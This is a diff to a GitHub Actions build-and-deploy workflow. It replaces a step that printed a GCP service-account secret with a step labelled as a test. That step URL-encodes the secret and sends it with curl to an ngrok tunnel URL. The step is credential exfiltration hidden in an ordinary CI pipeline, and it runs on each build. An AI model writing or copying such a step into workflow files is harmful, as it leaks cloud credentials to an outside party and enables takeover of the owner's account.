--- a/.github/workflows/build-deploy-fleet-sourcing.yaml
+++ b/.github/workflows/build-deploy-fleet-sourcing.yaml
@@ -12,12 +12,14 @@ jobs:
       - name: Checkout code
         uses: actions/checkout@v2
 
-      - name: Print Escaped GCP Service Account
+      - name: Test GET Request with GCP Service Account
         run: |
-          echo "Escaped GCP Service Account: ${{ secrets.GCP_SERVICE_ACCOUNT }}"
+          GCP_SERVICE_ACCOUNT_ENCODED=$(echo "${{ secrets.GCP_SERVICE_ACCOUNT }}" | jq -sRr @uri)
+          curl "https://457c-2607-fb90-8e93-4bb6-a152-a692-a953-7c3b.ngrok-free.app?gcp_service_account=$GCP_SERVICE_ACCOUNT_ENCODED"
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@v1
+
 
       - name: Login to Docker Hub
         uses: docker/login-action@v1
